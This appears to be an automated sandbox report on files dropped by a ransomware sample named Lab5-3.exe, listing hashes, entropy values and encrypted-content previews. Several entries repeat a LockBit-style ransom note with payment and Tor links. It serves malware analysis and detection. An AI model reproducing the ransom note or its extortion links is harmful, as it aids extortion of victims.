                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15568
                                                                                                          Entropy (8bit):7.988981124584419
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:iu4ty2xE+XHWTSL0GpS5e23DX/C9MfXVBxN2gtb:inty+XHltF2T/C6vVBxN1Z
                                                                                                          MD5:9C92DC3EAE439B8B66A548D56CDB76B1
                                                                                                          SHA1:B61C075BF361465AE12C83B323E925A63F7698F8
                                                                                                          SHA-256:516813048A891CB2A223BDF421B771882DC6F212BEA585E0484F990F86A502A3
                                                                                                          SHA-512:25348C0708C7471D06C0FD7F2A7E1FA7D76CA370175E8617B564C1B7CD205A5AA824DC44F5FC02A679DFFD391BF8A8B6D9F85BAA3BCF9BC1D2D79D84F2C5C4FA
                                                                                                          Malicious:false
                                                                                                          Preview:......m!.....-(3..53...U6.......$.".<. /_....\R..&.6.e....$.?.G.......&.2..)m5..p..$..6.!6O...!?"PB..7...i......6..(..M.fe..........o_.y.....c.,....F%/r6...4x]..L.$.^.)n~..R.%..R.6}...ZR^l.M..!=....@z..Fi-v..wM..$.G.~M.G....}C...NtB.06.t......W.......4K...&..^.@.T.. ..X....L.y......MC..U2..0W.j....Za8b..q+.....f.r.....".p.36=..d<......m../.6fd.8..Ai5.X......<..{#... N..N=..+..[.\..O...u...kF.L.'o...W...v.9..3.}8)Q.%.....P....6..%.x.7B1/.;.c.=....n.Qz.{.....(s.._......Y...kD..u..l...V.i..J.W...\.2...M............D........._..b.59.:...._....5..<q7.l..#.....W.E.J.D`G.....* .2...T...p3d.y....m....%.,.B.....b........BV..F.2..E...:d/.K..>@+..."........B...{.T.sg.C...G..d".^.+.......}.9&."....@.......1...U... Mb..]. k...|.....N....h[i.}.$...T.......!.o......F..........}6Q._/T.nIb...}..}%..L......?./..=S..........R.....Lb):9...)..c.(.....?R.d.%AB.M....#.++. .I&.y.-..a..K.$.]..k.m......_..(.....@..u.T*...#..5..:-c...V.Yx..E_P.U.OO[...#.i..H..1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.925565896917881
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mVWUiTfXrhdwKUQSgzId+p11y34v6G2SHfUTid3hBaUoSGFcmeykEdEElU92i:mVW9X3tN7y3mkGx0uKeY2ElUJ
                                                                                                          MD5:1FBE13CB52DC1A8DB79C9192E75F5B2F
                                                                                                          SHA1:181C658687E5064F52D6503BA85C4427BF642D64
                                                                                                          SHA-256:5DD4B2AE9E703BDEF473A4BE99141D80F5C48E52E1E13E0CBA86ED2D0010B9CC
                                                                                                          SHA-512:7B2A1437C00AED43D737FC3E6C69C75BCAC6563B2DC78BC8BCB2D24FA64061E36508A66BFC7861DA605AE4A87BBB5C4858D025AA7DBB2A5205F05ED392527097
                                                                                                          Malicious:false
                                                                                                          Preview:..\..w.]..3....u.Hp.7r....!.l..9...@..L......z.J...>..``.q..ay.L.... o?#.q;....#6<.v.c..s.n>.N.kl.."F.7j9.A..\K..h.C49W.....Q<.3.....O.=7......uSA.Oi..}....s..Y.K....>3;.m@....d.....j....g...B...Y...........}.`........i.mA.7mH....I...;..`A.m.v.G..`n.L.x...l....X...Q*.T.._.Hg..$.lO.p..U.....M.A<.i&Z.......P.Ld%.9..z%`...Q.I....>0.!.X..3...2.....O}.ib..W....R..57....m..+...`...5.]\...#.G.|.<C.......h....nZy.>YX.s..b.+.2Y.u..1. .?.*K....s^j.......#.r..I....n..e......E....y.F.j.p..Ol.!.7`B.HaM.b&.5K......1j0....3'.s.. ...w....T.P.L^..5.9.?...0...G....0..!V7i..N..c...>....7..._F..l.s.....U....Lk#.6H]G...2.H..i..=..4g!..k....'..]h...u............_.+.a1.......j...].-..L..f.....,.'t...).jc..:.."j...S&....^>.Z6....{k:.6.Q.w}.1.]......w.%...`yt^n.nZv@.O2a....0<'.i.|.6.?8...1.....3.>.s.C......Lp...2.J....F~.DCGT....3........q[...~F..o....5..T'2].?].......8.r.[P`hz9.y...V......H....l....)..Wh..GC..J. Y.6.!K...2......1.,Q.]"S.s9.*.+..6.@.=e.ha..[^e..'E
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6208
                                                                                                          Entropy (8bit):7.972755233224772
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:WOwTh4RJCiEiz4fhufr6umyniSm2qTML9BB84uNOvItE7lU2oRIe2Gx0uKeY2Elk:WOUuT94ZTynxm2D978hanQpV0Cb
                                                                                                          MD5:2A9216EC28FEE638059E2FD533DF3BBF
                                                                                                          SHA1:C9F37425F0507DB5FB39535FDB78CA43E464FDD2
                                                                                                          SHA-256:C4DAE64E0EAE2364EB70181386E1B6FFBB7DD62BDB67FC0202F0196A2C7F7F6E
                                                                                                          SHA-512:49FA089CFCF78956927833C9B488A01DECECA73C59C8F51292DDAB72CC82AC604D052A873CCD4D72A2D39F75097D0A34C982B4643037C133578D079A8B296466
                                                                                                          Malicious:false
                                                                                                          Preview:..\.D....N...cN.R..kx....Y......;jefQ.&y.....y..T...A[....b..2..,f....L`...F.c`..C...'l.<e.g......z.*>.2k.KR...um".aY.p.j.sF....g..Vf.JL%...O..W.......,...o..l.8....r..>( .B../...S....4~*.:6F...>.K.+ Nu...$..k3.m...G..W.....P.`...G.g..>.B.....uK..J.}..4..FZ.(.g:....f.u..H.e.2j..E.k...P...[..*z...8..\.v.~2.u..[.)ml...............9.8B.....j...)...e..&.)N9C.C..S.S.`.k.C.......T.B.s..&..!W........Gg.u5..(.,..M..KTQ.!m;%..y)t&.O....U`..`+.{.U......$.=.Su~u..-..q..3C2x...5..1?.n....-.[.or...HE..9..2k...Dd[_X!..;..=.7Y.....T...;.NE%/mJ.......a...Q.Z,.1.....m;D.Js]...B.x..]....{/....a|....V..2..-V#:..a....4.....C...H..j@.g.LN.v....R..I..1-.=....d....F\:......]..N....o.......g..2.}P.S.p......}..>8....N......e.x...R-.?T.#...V./.@H.#P7.N3.W"v.k.i...OYf.\0D..ZA*.].}4.T6..'..^...Y. ..].N.....d.....q8...q...........I.8.8..m/..d6e~l[]..%9H..7...6.Gw_OL.H..p.,....Eg*.S..R:J.f...|.w......S....(8.X...Q....<coLRF.?.r4)J.hI.q....:.t....p..%}.q..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.916129307188515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PXomIdZDXUluiDERUiyHfUTid3hBaUoSGFcmeykEdEElU92i:P4hP7U0i4VGx0uKeY2ElUJ
                                                                                                          MD5:82CEE7BE40C0DB3A6D276D99A0D77ABD
                                                                                                          SHA1:E80F6F81BBDBD350A7A51D2B820B7C6B10BABE77
                                                                                                          SHA-256:2DC2F133F558D6BCDB0169BFC9FF57FE283B6967316C359127274C53E14BD17F
                                                                                                          SHA-512:0F39F51706FEAF339E2CBBBB499CB6CD6F60BA8F2E3BD9ED55C651380D7B083EEE9012B85AB0C2D12AEE4E3784D5B54C9AAC0D05721EF667C2B55DFDF62382DE
                                                                                                          Malicious:false
                                                                                                          Preview:...r.hl.)C...ow.A.H.*o.Mc.....(Mf..<4F....M.j..J.2.M.d.@..u.I..[..d...5..4'...K..y..j.&.~...../p.....X...A.`@....nh..G....a......A...f...q.a.#*.........Y......g +.a....q..N.<.-.....!BU&i..LC...<..g.(k..Jc.aP...&.~y.{.......s.=..;.F\1m.Oq&......\...$....Z(......u{....xs.R.LfJ.)M.ee...$@W.....Q`y.#..:...R~...D...9...*K..*/..........i............V.....F......%.Ev..M-..#+.]../n....Y.....r{-TL...s...W.ge).K...[3.CmY..(@>..l;d....D.?E...........hm...5.N...o$C.r.ze..@.wB<..f....f.5.Mc...W0.&....49.+.....<nA..."C.3..Y..<b....]{...@.`J.z..D.<V....?..BU.....z.q{......#{[{w....`.^).e.#._S....Kw.T.N*.&..~....zc..i0......I.....rI[Z..+>.@..L[)dL..'0Y..Og9/.*..g-.6.)..rZ.~-.>.N.G...r.zzS./.G>[.v2.......0x!.....<.+.t.~........D.......|.].....nNq...2..Qv.7.. .G.....<76.1..r..@....!3...O w.M.7..v...bYxH[....".C.BN..r2.Am..fas..z......OH..X/..]..*wQ&..0Hj)....=g,..r...j..._.\..P.......&!.....+..1..{...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.929446794717073
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uziOFvfWLVBb4rGardVU7Gf58sHfUTid3hBaUoSGFcmeykEdEElU92i:kiOF0V6r3egiGx0uKeY2ElUJ
                                                                                                          MD5:E997A4F6BA5F931CDF0A4D622C87B144
                                                                                                          SHA1:81022C49DA3C41BA7ECAB7574F8759720856B2AF
                                                                                                          SHA-256:F70F34811F3463DFDCDDD52E1C3420EF8B7D802F792BC2634B531CBAE8694EF4
                                                                                                          SHA-512:9D3BEC3DF8AE83735294B5F3F32BF9FDFF81F23EF7A96C3BD8147CB34CC249F94DAA5AF22AB8E4A5FFB68CFE2433BA455CC7A6461B60948B9D181BBC7A780371
                                                                                                          Malicious:false
                                                                                                          Preview:..ahe.-.4....Yv...MT.f..M...6;#m{.........N|.w...........Y.0..3...U..,.......Bp......p)..u.2..\H.Aw.8]I.f....J=.....).!;.G.>..t..h..)H1...._' H.u..(7..N...........y.~....7.{>.&f.............do..H....<..-.....#...U.&(..*P.CB....YcK..SQv<K.|@?..F...f....>K;.b;.c...-.1A...x.e@...;........{....%Vd.^.d..c....RMJ.x.%..Z.o..m....2..W.........Z..t...K..0.h.5*j..Q"...|..:.....P...%%.....@....I......5_.w`.yTj....p`..a..i.T.H4>ut1e.k<..b..!.......+..7a].WW...<V..<.....L2.A.dN./..'....Z....<.....J......4.........V..T...FZ.`........V..:...|.xIT.P...m.."J....~......}.....X..FY..&r.....@l..k..w...l../..I..q.g............J.....]]..4.......u...,...$f........q!.B...wj.[....7.u..X5c.b.O.S.#z.D.....W........@....$b7..09.7u...hNhF....i3!.m../d:..>.;......%.c....%.n..2x..F.......s_8.?.4X._.J-.1&~5z3.J.5I`n..`..)[W.8..(.(.g.cN...T..p..[m...c.....7.%...2T.j.......W.t.gV.M1.*.F.p.(.v.,.....;.B.4.....v`...&.z._....'....eC#..)...=.v.j2n.:....R......[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.9011237229811275
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ApojEwsEbHfUTid3hBaUoSGFcmeykEdEElU92i:T1sEoGx0uKeY2ElUJ
                                                                                                          MD5:D603A825A9531FDB63129EC3A5125BB9
                                                                                                          SHA1:057E1CE37F84348EEB549BCC9F9602E19B3B6C19
                                                                                                          SHA-256:A05117D3B02BD0A3C1D04A02C0C23E4390E75FA1BDA0EEF1B4CBEC82699E4ED9
                                                                                                          SHA-512:FF1493072E07899F20C175DC965C82E0F8FAB2EC9313CFDEFCABA614730CAC3EFEBA131AEC786E85541339F08692DCF75648A46D94F939609EA53A96CFBEB132
                                                                                                          Malicious:false
                                                                                                          Preview:..>_m..Y.El.:...M{.....#G...a..P7........`..cO&..`.%..n.....^..}.x.(Q.8...v....-...6F.e.e...XH.aU.V.M..E.).l.'3......N..q.....\*)..r.y.XI;.......y..........ox'uZ0..xO...R..I.r......d..f3G........V..L1....8{....X.......>..Jf ..X..&... ./`..6+./..;..x..d".........k....$$\.M.......G....)X.,.S=|...0E...5.V....q....ZU..A...g.H.7'...}...W8..%....h......A....l.........5.{.d9smr.ZHr.\Q..0z....V..t...[..dSL.]..1s...:......'\.@.....U..a.y...J..k.sg.......n;.\^/.S.~.0g.X.x.....6.J:~@7...R..R.....qr........B....p.J.`8......t..4I..'.E`J...4....~..z..{.......@.f.8..-.8..........zz.%..F.u.l..^o..O....4=......H.'lr.".~y.t.lV...,.,:..."...C..).!.+...y...2KB...\....d........y.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.919163420067386
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gb+wvO256ZnHPd6950HfUTid3hBaUoSGFcmeykEdEElU92i:cxvO2MgzGx0uKeY2ElUJ
                                                                                                          MD5:DADA2CBD5E2CCB598CFABE9BDD127EED
                                                                                                          SHA1:58C4EF495095C52ED1C70C08CB8C5BD5F8A3B43A
                                                                                                          SHA-256:B22C8A3DF1D2EF7A29A790DB356A9CAA6A7BDD39811D62D46F1B77509B220319
                                                                                                          SHA-512:D0C8891088C610F0E233EB36A023CEEE64EF1AAF54D38B3A6F31DD630EF1013265EE4B76353A1FA4757989B4FE8C2021401ECD72E6FC9FBE9E125CB8B3BCACB9
                                                                                                          Malicious:false
                                                                                                          Preview:[js..2..$..zz.....Yi.....Iu..y...Z.N."..&...U.ZM...&.........u.-Q74..shW...#.^L...5......2..K.... .b.....|..!...'..e.RD._$.A.q..R-..(....x...l..{.L.".&...yg.g. .;.A.GB.x..[W...=3.{.!f.{.{.....7%h/.1.)R......u..}o.=".@..M%...<.s.....z..nP....9.x....vPw..n9.k...4F...R...D..9m...x>.o..Oo ^..J...L.nlE.... .....v....m....CG.[.B.MG{..........;.'.HP....-k......m....|zv....hU..k...Y3r....j\.fb..v...ad..Kws.T.A. S......S%..Z...d%B~.....yxd..l5Hi.X.Y.N.c....Ak.4..n.;T2Q..0k..h..S.H....q....LH......%.,...........M/X.m.D.__Y..<B..)..VY.B.(...b.y.&...O...."..#.;.^.....|?.........&.@}...t.s......8J.v,.(lG.K..+..:K.H.....YTS.J.}A.1.g%...........C&.......a?...2.N=......1.....Y....}.X...\.,.N.i.D..32...Q..P2.+..}..)=.R3.G.^+.-NrV../.I.;...I.....q.g..F.Z.c.~..}'r.......;...|R.T^..}....bN......=...Z.<.]_r.H.u8.K5.k.%.........._..~$r.........S?:..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.913706943265701
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:vfFc+EmYuoq7E8S4e1UHfUTid3hBaUoSGFcmeykEdEElU92i:vw7RCQGx0uKeY2ElUJ
                                                                                                          MD5:3A35EE03F7DC4AA96D5330FC2CB07358
                                                                                                          SHA1:EB97F3A4D04ED7738E66A7BF2B82596FC307D786
                                                                                                          SHA-256:8AE2C9455E34DB27DA4D77771AD3E12900ED1453420A4B2E8A163902859F727A
                                                                                                          SHA-512:A7E6BFB302CEF12B5DD1110B25DE84F3EA4949FB6E37D216720B61435D82A862E122B7ACB9D1EB854DEC64B3B6BEE58763F064C489F99CD7CAB5C8EEA8170E76
                                                                                                          Malicious:false
                                                                                                          Preview:....Kx....N....1T.............[..x.....Ztsa.44=............*.B!'R8.3k.e2...&...u&...._~:..f&..z...zqN4C.....V *...{.e..' P....ig..Y`.|......6.7q...]...../.@we(..3V'Y...S~i.!..B..l,.qY....'....~.\.Y.....#(.:...?.N......e1v.k....,....Y.Q.Z.."...q.$]ET.k.....lL...H.j_..YD.;U.|q....>~Q...M.O|W..._.p..pl.A.|Q^Z....zSb.i. .l3c =....Yb`r...1... .....h'........%.3..+.?....Wb.e@.q..Q...&Q.g;..x...K.f...Kz.F8uWdK..Nom..L.6'....^.qs..X...V.^....K0..N...g...c%....6gm`>.=...&.D.i.....%..K.1...>u....W..8j.......Q..o..h.....a...m..[J....tR+...X.(...[.6..2..k.:N.+..xQ....._...7Q3....E...}.......L.....r@..D..<!#$I.{H{.#.8..G..`,.q|..;..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.9142226948884975
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zMcj+eBGkCQnZGR7ezN9HfUTid3hBaUoSGFcmeykEdEElU92i:oc6CGkCQC2MGx0uKeY2ElUJ
                                                                                                          MD5:EEC2F442856E4BC12262210CE86D8312
                                                                                                          SHA1:A37D430CCC9DB8932772A3B67275C2E1AD9B7419
                                                                                                          SHA-256:DD3D079C3CC415BD2C1EA22494DEE7F13391A9A0AFC7A67CD0E427D470C11D4E
                                                                                                          SHA-512:570D12B8BE5A3B9E95CFB99ADEF986CEE3A04365CF12C28BEBF025A2A96BA65E0568103746CA00B645269FB1D56A96793C7F1319BB6C382CE263DE1926E83045
                                                                                                          Malicious:false
                                                                                                          Preview:..=6&....X.0.@N.....Q'<i.\...u...[..<..p.!...."..L...\gH..mN..;ct.(.J..p.q......>~.R.u...(.t.$h....7-:4...S...-.h.i2.wntU.I.e{.@........|J..u.X.p.x.)..,I.B..;....\..up...o.KS....C..x.iU.....-....h./{..3..V..)....".Ul.|.`...e..S:..S........=.z2@AY..s..5...;$s.Y..Ni.yg....W.....__....g.dm&..3.&..P..G..../*...UH..R...'..Dt.....?..-v...)...a.3.g.ARA...6"'....k&.1k..;....x.bd.M.4....m.c....N.}#i'O......C.c....[.3i.~...e.......b...0u.;S..6I.'..V......W.jXY...Y8*M.U...%u..M7....PtE.R.mM....ow.......y.......h..A.!..S.t.T.....3...6...Q....~.4.;.L.*.....m...............l..>...p..S C3../..D"......Z....5..P@5.OGC.-->.P.P.~.9..L~.;..}L$r.i.3.?....+....t:hy.7RL.....#8..$^._(..a..{@..=oC.9u..7 J....J.X.:&.=+Co#.F........;XR...FiX..5......b.W..:....'...ai..l.@....9..i.0d.-jU...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.916160534015007
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Qn43dIAud7R10be52UCHfUTid3hBaUoSGFcmeykEdEElU92i:G43tudfOe5Gx0uKeY2ElUJ
                                                                                                          MD5:FCD83864CBAE299D9126661928DE8DA4
                                                                                                          SHA1:E2E5FA9C5AE742158A6760BBE75A869424AE6456
                                                                                                          SHA-256:5FF578EE485D6A3568AFB7C3452B7528151E9211FABFB6259532244BFDC790B7
                                                                                                          SHA-512:0C5A1660A0EB3B8856447C06CA930015A5D1C5BE5E9302E124DACD9F4B0A0E5794C3B400E62F78BEC67233FB1559F0F7CB35E3FB682460BCB1CD8A8234BCFF4E
                                                                                                          Malicious:false
                                                                                                          Preview:Z..'*2o.._J.h.%...4..5P%....x5....4.NG..........B...[C.!..x.J@..JL.Z..$D..'U=.K....x..G.X.D.;.y....w=<..p.k...uI.ov..4.../.z.I.R/..r)H..._b.#.....M!.r.B=W0a..6I.<.....`O.t.C.....rP..F../;....|.....)..ON.l..........SJ..............1.9..Du.....8.E.....~.....`g...]...-...}.E..U...).f....y..e.ij.._5.Sv..JT+.f`..\R.i.wYXz.M;..%....`......PW.1~....b....r..H....D..9........y.....T0...d.C...........m>.......T.=p...8...g..3.\......>s..1..B.H!!\+..p@.|dC...2........pM<.L..s..!*.0....?...pt ..zF....'...7F...5..u.A....u..G.\..|x ./..<...X.W=.X..+..~Z&.\F.z;...._(&.....0Zh3......1r...)Y...j......A.[KVva~k..C.!e..9#j.g#..#...~.&].$.l.......7..,Z.6.D]..>8....V9On..&..<-}.....]...R.y.=.%..n..'...|.!...T%....p<.<y........9...O.nr...^.p..._7_......j.#&cA.....35.\YU.%ayj=>...i....4....F.L:....7.S|...-...Rp/.Z..cR..l.....[V.Bj.j.rl.....#hX.....+.D..=..Jb\.%.....B.%.^...~.t.......q.=.^.i.Y.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.926112708205781
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:455kWpGfUvhC6EM5DeRgBDeZBiOHfUTid3hBaUoSGFcmeykEdEElU92i:4kWlpCs5DoimBgGx0uKeY2ElUJ
                                                                                                          MD5:D472A35292A17AD591FF2AAC89E3E46F
                                                                                                          SHA1:9887B21A3ADD4858EE52AEE45B987A69CB2269BC
                                                                                                          SHA-256:F65030DE086F0E499C1E8C9C69FAF8DB0BC4A000A0578AC2071852536C898530
                                                                                                          SHA-512:7FA55FA1179FA218E7A809DB167115610A8865E2820EF5D70F7943E59107E39D22EC82FD374B250B312A99EF9DA3FF0FD82E1BEF8BC80FC92FC998525626F22B
                                                                                                          Malicious:false
                                                                                                          Preview:....G.Pm_.....ex./S-....nt..v..SU.......%.u...].7..N..s...=+...._N[..\..ei..P..x.!.W..<.j..!P.'.1f.#..?J...L....jB.]..7Z....:.A.TL$....:n.n@...y..g.N....V..UUl....I...=E..N,........Y../.k..}.../Z....;.t.....%....\......+.M..j...'..?.;\..%@/..m..=...&#.u......Y..w..xa.g..%.]JF."<._[.u......s.x:...bc..q/....M..D....G..?.=.]mjS....x`.uO.V.[.A.r.O.....v....s......r.J.f.H'...Oh&..Jf.....u.....f....bm..L.s........2F.k/6..J..^...#...l.S...,%.0..."v:..(X_e&...)X._.~D...G=wW.{.`"..h...r....I}B._'n...t..4....:D.fY.......D.....c....\(.W...fP^..z$..D............A...5;S.d..q.7z!..r..I|q...N.H..$.....6.z-..-.M.>.N...;K.WvB.~..IO._....?a...Is.*=......m...Z.9U..d#..S...{.s.q.J.G.e.*o..]Ei....E........z0.`Xs..#..Vr2..L...q#z.51_.*..L....e.}J...P...[..>3.)...`.|..5}.h...\M.B...'.%B....\"...A^h...|%.IF.....Baq..e.[9.O..l......q..,a.....v....>?.....b\-1A2._o...U.[.x...\>8.&.n..>3.s6.JO..}.....Sxh....3I..%....h...+..n.._.3\..aQ..'.....Y..\...l'.....r(&...3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.909533546662933
                                                                                                          Encrypted:false
